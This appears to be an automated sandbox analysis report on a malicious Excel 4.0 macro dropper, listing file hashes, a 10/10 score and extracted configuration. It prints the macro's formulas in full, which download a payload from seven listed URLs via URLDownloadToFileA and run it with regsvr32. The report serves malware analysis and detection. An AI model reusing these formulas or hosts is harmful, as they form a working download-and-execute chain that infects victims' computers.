General

  • Target

    971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

  • Size

    37KB

  • Sample

    241120-zscksssfrd

  • MD5

    c48c0424f9a8fdcae930b8782d738017

  • SHA1

    97c3cecb4e447b4374e3ee5614458f5abecb2c88

  • SHA256

    971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

  • SHA512

    bb7239fe527e698d1e15846b1de55c2a06decf0c216b17095fcdc32f415324253afe7125a91cc262ca32a1473e2683b7ed0cc7fbd9829195ee6d9b71177d4981

  • SSDEEP

    768:5BnpO75ZJVzXxjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo1:30lpZOZZ1ZYpoQ/pMAQVr

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/
    https://bigideas.com.au/images/w5FLAJPmvbk9/
    https://webstream.jp/died-wing/oOzfVc/
    https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/
    https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/
    https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/
    https://breedid.nl/cgi-bin/aCbt/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/","..\dfeb.ses",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bigideas.com.au/images/w5FLAJPmvbk9/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://webstream.jp/died-wing/oOzfVc/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://breedid.nl/cgi-bin/aCbt/","..\dfeb.ses",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfeb.ses")
    =RETURN()

Extracted

  • Language

    xlm4.0

  Source          URLs
  xlm40.dropper   https://broadwaymelody.ca/stats/DVYw4Qpcf1yo/
  xlm40.dropper   https://bigideas.com.au/images/w5FLAJPmvbk9/
  xlm40.dropper   https://webstream.jp/died-wing/oOzfVc/
  xlm40.dropper   https://24hbinhphuoc.com.vn/data/FosZ5GFS6PP3kshbVn7/
  xlm40.dropper   https://bmnegociosinmobiliarios.com.ar/cgi-bin/bijhAMWReA0H3i8a/
  xlm40.dropper   https://binnuryetikdanismanlik.com.tr/images/VbytyOFtS1MF/
  xlm40.dropper   https://breedid.nl/cgi-bin/aCbt/

Targets

    • Target

      971628ac87ae8c821a3a09469fc24d3752fb1a30b28ed0e0ffd00500615fb3c0

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15